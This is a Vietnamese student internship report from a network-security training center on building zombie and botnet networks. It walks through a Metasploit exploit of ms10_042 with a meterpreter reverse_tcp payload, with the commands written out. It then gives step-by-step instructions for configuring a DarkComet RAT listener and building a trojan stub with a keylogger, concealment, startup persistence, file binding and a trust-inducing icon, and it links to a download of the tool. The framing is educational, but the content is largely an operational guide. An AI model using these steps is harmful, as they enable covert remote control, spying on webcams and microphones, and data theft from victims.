1. TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG
VÀ AN NINH MẠNG QUỐC TẾ
ATHENA
BÁO CÁO THỰC TẬP
ĐỀ TÀI: Nghiên cứu và triển khai mạng lưới
zoombie , botnet trên hệ thống mạng
Giảng viên hướng dẫn : Võ Đỗ Thắng
Sinh viên thực hiện Nguyễn Hoài Huy
2. Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang1
3. Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang2
MỤC LỤC
LỜI MỞ ĐẦU 3
PHẦN 1 5
GIỚI THIỆU VỀ BACKTRACK 5 5
1. Giới thiệu ..........................................................................................................5
2. Mục đích ...........................................................................................................5
3. Cài đặt ...............................................................................................................6
3.1 Live DVD...................................................................................................6
3.2 Install..........................................................................................................6
PHẦN 2 13
TRIỂN KHAI TRONG MÔI TRƯỜNG LAN 13
1. Mô phỏng mạng LAN.....................................................................................13
2. Scanning..........................................................Error! Bookmark not defined.
2.1 Network scanning.....................................Error! Bookmark not defined.
2.2 Vulnerability scanning .............................Error! Bookmark not defined.
3. Penetration test (Pentest – Kiểm tra xâm nhập)Error! Bookmark not
defined.
4. Tạo virus .........................................................Error! Bookmark not defined.
PHẦN 3 17
ỨNG DỤNG TRÊN HỆ THỐNG HONEYPOT Error! Bookmark not defined.
1. Mô hình mạng của hệ thống Honeypot...........Error! Bookmark not defined.
2. Ràng buộc Domain name với địa chỉ IP publicError! Bookmark not
defined.
3. Cài Metasploit cho VPS..................................Error! Bookmark not defined.
4. Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang3
4. Thực hiện kiểm soát từ xa...............................Error! Bookmark not defined.
KẾT LUẬN 25
TÀI LIỆU THAM KHẢO 26
LỜI MỞ ĐẦU
1. Sự cần thiết của đề tài
Trong các kiểu tấn công hệ thống trên internet, tấn công DDoS (Distributed
Denial of Service) là cách tấn công đơn giản, hiệu quả và khó phòng chống bậc nhất.
DDoS là cách tấn công dựa vào việc gửi số lượng lớn yêu cầu (request) đến hệ
thống nhằm chiếm dụng tài nguyên, làm cho hệ thống quá tải, không thể tiếp nhận
và phục vụ các yêu cầu từ người dùng thực sự. Ví dụ điển hình là vào tháng 7 năm
2013, hàng loạt các trang báo điện tử của Việt Nam như Vietnamnet, Tuổi Trẻ
Online, Dân Trí, Thanh niên Online bị tấn công dẫn đến không thể truy cập được
trong nhiều tuần lễ liên tiếp. Theo thống kê từ Abort Network, đầu năm 2014 có
hơn 100 vụ tấn công DDoS trên 100Gbps, 5733 vụ tấn công đạt 20Gbps gấp hơn
hai lần năm 2013.
Để có thể tạo được số lượng yêu cầu đủ lớn để đánh sập hệ thống mục tiêu,
các hacker thường gây dựng mạng lưới zombie, botnet với số lượng có thể lên đến
hàng triệu máy. Vì vậy, nghiên cứu về cách xây dựng mạng lưới zombie, botnet sẽ
giúp chúng ta hiểu hơn về cách hoạt động, từ đó xây dựng các biện pháp phòng
ngừa sự phát triển của hệ thống zombie, botnet.
2. Mục tiêu nghiên cứu
Đề tài nghiên cứu trên hai môi trường:
Giai đoạn 1: Trong môi trường mạng LAN, tìm ra được các lỗ hổng bảo mật
trên các máy trong mạng, thử xâm nhập trên các máy.
Giai đoạn 2: Trong môi trường Internet, dùng DarkComet để thử tạo, phát
tán và điểu khiển mạng lưới botnet thông qua mạng Internet.
3. Phương pháp nghiên cứu
5. Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang4
Giai đoạn 1: Sử dụng ảo hóa VMware để mô phỏng môi trường mạng LAN.
Cài đặt Backtrack trên một máy ảo VMware. Sau đó thực hiện thâm nhập từ máy
Backtrack tới một mục tiêu.
Giai đoạn 2: Cài đặt và tạo bot trên VPS (Virtual Private Server) và phát tán
trên mạng. Sau đó thực hiện xâm nhập, kiểm soát từ xa thông qua địa chỉ IP public
của VPS.
4. Kết cấu đề tài
Phần 1: Giới thiệu về Backtrack 5
Phần 2: Triển khai trong môi trường LAN
Phần 3: Triển khai xây dựng botnet bằng DarkComet
Kết luận
6. Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang5
PHẦN 1
GIỚI THIỆU VỀ BACKTRACK 5
1. Giới thiệu
Backtrack là bản phân phối dựa trên GNU/LINUX Debian nhắm mục đích
pháp y kỹ thuật số và sử dụng thử nghiệm thâm nhập.Việc phân phối Backtrack có
nguồn gốc từ sự hợp nhất của hai phân phối trước đây là cạnh tranh mà tập trung
vào thử nghiệm thâm nhập: WHAX và Auditor Security Collection.
2. Mục đích
Backtrack 5 có các công cụ được sử dụng cho quá trình thử nghiệm xâm
nhập. Các công cụ kiểm tra xâm nhập trong backtrack 5 có thể được phân loại như
sau :
1. Information gathering: loại này có chứa một số công cụ có thể được sử dụng
để có được thông tin liên quan đến mục tiêu DNS,định tuyến, địa chỉ
email,trang web,máy chủ mail…Thông tin này được thu thập từ các
thông tin có sẵn trên internet,mà không cần chạm vào môi trường mục
tiêu.
2. Network mapping: loại này chứa một số công cụ có thể được sử dụng để có
kiểm tra các host đang tôn tại,thông tin về OS,ứng dụng được sử dụng
bởi mục tiêu,và cũng làm portscanning.
3. Vulnerability identification: Trong thể loại này, chúng ta có thể tìm thấy các
công cụ để quét các lỗ hổng (tổng hợp) và trong các thiết bị Cisco. Nó
cũng chứa các công cụ để thực hiện và phân tích Server Message Block
(SMB) và Simple Network Management Protocol (SNMP).
4. Web application analysis: loại này chứa các công cụ có thể được sử dụng
trong theo dõi, giám sát các ứng dụng web.
5. Radio network analysis: Để kiểm tra mạng không dây, bluetooth và nhận
dạng tần số vô tuyến (RFID).
6. Penetration: loại này chứa các công cụ có thể được sử dụng để khai thác các
lỗ hổng tìm thấy trong các máy tính mục tiêu.
7. Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào các
máy tính mục tiêu, chúng ta có thể sử dụng các công cụ trong loại này để
nâng cao đặc quyền của chúng ta cho các đặc quyền cao nhất.
8. Maintaining access: Công cụ trong loại này sẽ có thể giúp chúng ta trong
việc duy trì quyền truy cập vào các máy tính mục tiêu. Chúng ta có thể
7. Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang6
cần để có được những đặc quyền cao nhất trước khi các chúng ta có thể
cài đặt công cụ để duy trì quyền truy cập.
9. Voice Over IP (VOIP): Để phân tích VOIP chúng ta có thể sử dụng các công
cụ trong thể loại này.
10. Digital forensics: Trong loại này, chúng ta có thể tìm thấy một số công
cụ có thể được sử dụng để làm phân tích kỹ thuật như có được hình ảnh
đĩa cứng, cấu trúc các tập tin, và phân tích hình ảnh đĩa cứng. Để sử
dụng các công cụ cung cấp trong thể loại này, chúng ta có thể chọn Start
Backtrack Forensics trong trình đơn khởi động. Đôi khi sẽ đòi hỏi chúng
ta phải gắn kết nội bộ đĩa cứng và các tập tin trao đổi trong chế độ chỉ
đọc để bảo tồn tính toàn vẹn.
11. Reverse engineering: Thể loại này chứa các công cụ có thể được sử dụng
để gỡ rối chương trình một hoặc tháo rời một tập tin thực thi.
3. Cài đặt
Chúng ta có thể tải bản Backtrack 5 tại địa chỉ: www.backtrack-
linux.org/downloads/, có bản cho Vmware và file ISO.
1. Live DVD
Nếu chúng tamuốn sử dụng Backtrack mà không cần cài nó vào ổ cứng,
chúng ta có thể ghi tập tin ảnh ISO vào đĩa DVD, và khởi động máy tính của chúng
ta với DVD. Backtrack sau đó sẽ chạy từ đĩa DVD. Lợi thế của việc sử dụng
Backtrack là một DVD Live là nó là rất dễ dàng để làm và chúng ta không cần phải
gây rối với cấu hình máy hiện tại của chúng ta. Tuy nhiên, phương pháp này cũng
có một số nhược điểm. Backtrack có thể không làm việc với phần cứng, và thay đổi
cấu hình nào được thực hiện trên phần cứng để làm việc sẽ không được lưu với đĩa
DVD Live. Ngoài ra, nó là chậm, vì máy tính cần phải tải các chương trình từ đĩa
DVD.
2. Install
1. Cài đặt trong máy thật
Chúng ta cần chuẩn bị một phân vùng để cài đặt Backtrack. Sau đó chạy
Backtrack Live DVD. Khi gặp màn hình login, ta sử dụng username là root, pass là
8. Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang7
toor. Sau đó để vào chế độ đồ họa, ta gõ startx và ta sẽ vào chế độ đồ họa của
Backtrack 5.
Để cài đặt Backtrack 5 đến đĩa cứng ta chọn tập tin có tên install.sh trên
desktop và tiến hành cài đặt. Tuy nhiên, nếu không thể tìm thấy tập tin, chúng ta có
thể sử dụng ubiquity để cài đặt. Để sử dụng ubiquity, ta mở Terminal gõ ubiquity.
Sau đó cửa sổ cài đặt sẽ hiển thị. Sau đó trả lời 1 số câu hỏi như thành phố chúng ta
đang sống, keyboard layout, phân vùng ổ đĩa cài đặt,… Sau đó tiến hành cài đặt.
2. Cài đặt trong máy ảo
Điểm thuận lợi là ta không cần chuẩn bị một phân vùng cho Backtrack,
và sử dụng đồng thời một OS khác. Khuyết điểm là tốc độ chậm, không dùng được
wireless trừ USB wireless.
Ta có thể có thể sử dụng file VMWare được cung cấp bởi BackTrack.
Từ đây chúng ta có BackTrack trên máy ảo thật dễ dàng và nhanh chóng. Cấu hình
trong file VMWare là memory 768MB, hardisk :30GB, Network:NAT. Để sử dụng
được card mạng thật, ta phải chọn Netword là Briged
Dưới đây làm một số hình ảnh khi cài BackTrack trên máy ảo
VMWare
9. Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang8
Tạo một máy ảo mới và cho đia BackTrack vào
Giao diện khởi động của BackTrack
Gõ startx để vào chế độ đồ họa trong BackTrack
10. Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang9
Để cài đặt, click chọn vào file Install BackTrack trên màn hình Desktop
11. Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang10
Chọn ngôn ngữ, chọn Tiếp để tiếp tục
Chọn múi giờ, chọn Tiếp để tiếp tục
12. Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang11
Chọn ngôn ngữ bàn phím, chọn Forward để tiếp tục
Chọn phân vùng để cài, chọn Tiếp để tiếp tục
13. Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang12
Nhấn Cài đặt để bắt đầu cài
Quá trình cài đã bắt đầu.
Sau khi hoàn tất, chúng ta khởi động lại
14. Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang13
PHẦN 2
TRIỂN KHAI TRONG MÔI TRƯỜNG LAN
1. Mô phỏng mạng LAN
Mô hình mạng LAN được mô phỏng:
Để chỉ định máy ảo sử dụng Bridge ảo VMnet0, trong giao diện VMware, kích
chuột phải vào tên máy ảo, chọn Setting…, trong tab Hardware, chọn mục Network
Adapter, sau đó trong mục Network Connection, chọn tùy chọn Bridged
2. Thử nghiệm xâm nhập bằng Metasploit
Trong Backtrack5r3, chúng ta sử dụng công cụ Metasploit để thực hiện xâm
nhập.
Để khởi động giao diện Console của Metasploit, trong Terminal, gõ lệnh
msfconsole.
Switch
PC1 PC2 PC3
15. Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang14
Giao diện sau khi dùng lệnh
Để sử dụng một module nào đó, chúng ta sử dụng cú pháp:
use <Đường dẫn đến module>
VD: khai thác lỗi ms10_042
Sử dụng lệnh search ms10_042 để tìm ra moudle cần dùng
16. Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang15
use exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec-> Enter
Các thiết lập:
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST 192.168.1.101
set LHOST 192.168.1.101
exploit
Sau khi exploit, Metasploit sẽ tạo một link chứa mã độc (http://192.168.1.101:80/),
chỉ cần nạn nhân click vào link thì mã độc sẽ được gửi sang máy nạn nhân và sau
đó có thể chiếm quyền máy.
17. Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang16
18. Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang17
PHẦN 3
XÂY DỰNG BOTNET BẰNG DARKCOMET
1. Giới thiệu DarkComet
DarkComet là một công cụ quản trị từ xa (Remote Administrator Tool) miễn
phí rất nổi tiếng, Tuy nhiên mình thấy Dark Comet là một soft đơn giản cực
kì lợi hại và nguy hiểm, với các tính năng như:
+ Remote Desktop Như TeamViewer nhưng không cần sự đồng ý.
+ Xem các thư mục của máy victim, ăn cắp tài liệu từ máy victim.
+ Có thể tạo, đọc và xóa các thư mục trong máy victim.
+ Xem lén Webcam của victim.
+ Nghe trộm qua microphone của victim.
+ Mở website bất kì mà không cần sự đồng ý của victim.
+ Chat với victim (cái này fê phết, victim còn đíu tắt được cơ)
+ Keylog có thể xem luôn hoặc về email.
+ Xem regedit
+ Có thể sử dung chức năng ctrl + alt + del, Task Manager
+ Download file và chạy bình thường hoặc là ẩn ( Send sang máy victim
thêm vài con trojan nữa chẳng hạn)
+ Khởi động cùng win con trojan đó…
Dự án DarkComet RAT đã phát hành bản chính thức cuối cùng là
DarkComet RAT v5.4.1 Legacy vào ngày 1/10/2012.
2. Cài đặt DarkComet
Bản darkcomet dùng trong báo cáo được tải từ:
http://www.mediafire.com/download/37bd1c0acbd2p6c/darkcomet+5.3.1.ra
r.
Chạy DarkComet trên linux:
Tải bản DarkComet về, giải nén vào thư mục darkcomet5.3.1RAT dùng lệnh:
unzip darkcomet5.3.1RAT.
Mở terminal, chuyển thư mục làm việc hiện hành về darkcomet5.3.1RAT.
Dùng lệnh wine darkcomet để khởi động DarkComet: wine darkcomet
19. Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang18
Giao diện quản lí các bot của DarkComet, chờ đợi các kết nối tới:
Tạo cổng lắng nghe các kết nối từ nạn nhân: Vào DarkComet-RAT -> Listen to new
port(+Listen)
Điền cổng kết nối, cổng mặc định là 1604. Chọn Listen để xác nhận
Giao diện thêm socket lắng nghe
Ta có thể thêm cổng lắng nghe khác nếu muốn.
20. Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang19
Tạo trojan:
Trojan có thể được tạo từ bất kì máy windows nào. Các bước tạo trojan:
- Download DarkComet v 531
- Sau đó giải nén file DarkComet531RAT.zip
- Vào thư mục giải nén, chạy file DarkComet.exe
- Ch úng ta c ó 2 t ùy ch ọn. ch ọn option c ủa tro jan theo m ặc đ ịnh
(DarkComet -> Server module-> Minimalist) ho ặc t ùy ch ọn (DarkComet -
> Server module-> Full Editor)
Giao diện tùy chọn:
21. Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang20
- Các cài đặt:
+ Main settings
- Password
- server ID,
- profile name
- tùy chọn bypass tường lửa
+ Network Settings
Cài đặt IP sẽ lắng nghe các bot và cổng lắng nghe của server.
22. Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang21
+ Module Startup
Tùy chọn bot có khởi động cùng Windows hay không.
23. Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang22
+ Install Message
Hiển thị hộp thoại thông báo và nội dung khi nạn nhân chạy
chương trình bot hay không
+ Module Shield:
Các tùy chọn giúp bot ẩn
24. Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang23
+ Keylogger
Tùy chọn ghi log bàn phím, địa chỉ tải log.
+ File Binder
Tùy chọn đính kèm file khác.
25. Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang24
+ Choose Icon
Tùy chọn một icon để tạo sự tin tưởng cho nạn nhân.
+ Stub Finalization
Tùy chọn định dạng xuất file trojan (.exe, .com, .bat, .pif, .scr),
tùy chọn cách nén file trojan và lưu các cài đặt để sử dụng lại.
26. Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang25
Sau khi đã cài đặt xong các tùy chọn, chọn Build The Stub và chọn nơi lưu
để tạo trojan.
Giao diện quản lí users:
Giao diện điều khiển user:
KẾT LUẬN
Từ khi ra đời đến nay, mạng internet luôn tiềm ẩn nguy các nguy cơ bảo mật. Tìm
hiểu về mạng lưới zombie, botnet rất có ích cho người dùng phổ thông, giúp hạn
chế nguy cơ bị biến thành botnet. Đề tài này càng có ít cho người quản trị hệ thống,
27. Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang26
giúp hiểu rõ cơ chế hoạt động của mạng lưới zombie, botnet, từ đó đề ra các biện
pháp phòng ngừa thích hợp.
TÀI LIỆU THAM KHẢO
1. Trung tâm đào tạo Quản trị mạng & An ninh mạng Athena, “TÀI LIỆU
HƯỚNG DẪN VÀ SỬ DỤNG BACKTRACK 5 ĐỂ KHAI THÁC LỖ HỔNG
MẠNG TẠI TRUNG TÂM ATHENA”
2. Trung tâm đào tạo Quản trị mạng & An ninh mạng Athena, “Bảo mật mạng
– Bí quyết và giải pháp”
3. Diễn đàn Athena, http://athena.edu.vn/forum/forum.php
4. http://www.arbornetworks.com/corporate/blog/5243-volumetric-with-a-
capital-v
Giảng viên hướng dẫn
Võ Đỗ Thắng